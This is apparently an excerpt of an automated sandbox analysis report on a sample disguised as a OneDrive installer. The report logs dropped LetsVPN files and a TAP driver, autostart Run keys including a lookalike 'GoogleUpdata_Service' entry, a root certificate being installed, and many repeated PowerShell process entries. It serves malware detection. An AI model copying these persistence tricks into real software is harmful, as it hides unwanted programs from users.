                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\tr\System.Web.Services.Description.resources.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Globalization.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.MemoryMappedFiles.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Linq.Expressions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Formatters.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsDialogs.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.AppContext.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\SETE887.tmpJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsExec.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\driver\tap0901.sysJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Text.Encoding.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.Specialized.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.NetworkInformation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsVPNInfraStructure.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\MdXaml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Xml.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Memory.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Runtime.Serialization.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Management.Automation.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.Primitives.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Reflection.Extensions.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\WebSocket4Net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\SQLite-net.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\ToastNotifications.Messages.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Resources.ResourceManager.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Local\Temp\nsj49F4.tmp\nsProcess.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Security.Cryptography.ProtectedData.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Threading.AccessControl.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Newtonsoft.Json.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\Microsoft.Web.WebView2.Core.dllJump to dropped file
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeFile created: C:\Users\user\AppData\Local\Temp\{8bbf3398-85b1-894f-af03-707e5cd577b1}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Collections.NonGeneric.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Net.WebSockets.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.Xml.ReaderWriter.dllJump to dropped file
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Program Files (x86)\letsvpn\app-3.12.2\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\SETEB17.tmpJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\DriverStore\Temp\{e1a4fd9a-c078-804d-adb0-e99915b985de}\tap0901.sys (copy)Jump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\SETF101.tmpJump to dropped file
                Source: C:\Windows\System32\drvinst.exeFile created: C:\Windows\System32\drivers\tap0901.sys (copy)Jump to dropped file

                Boot Survival

                barindex
                Creates multiple autostart registry keys
                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GoogleUpdata_ServiceJump to behavior
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO
                Source: C:\Windows\System32\drvinst.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tap0901
                Source: C:\Windows\System32\svchost.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\Linkage
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpnJump to behavior
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\LetsVPN.lnkJump to behavior
                Source: C:\Users\Public\Videos\bin.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\letsvpn\Uninstall.lnkJump to behavior
                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GoogleUpdata_ServiceJump to behavior
                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GoogleUpdata_ServiceJump to behavior
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LetsPRO

                Hooking and other Techniques for Hiding and Protection

                barindex
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeCode function: 9_2_6CF0661E IsIconic,9_2_6CF0661E
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files (x86)\letsvpn\app-3.12.2\LetsPRO.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\8094640EB5A7A1CA119C1FDDD59F810263A7FBD1 Blob
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OneDriveSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Videos\bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
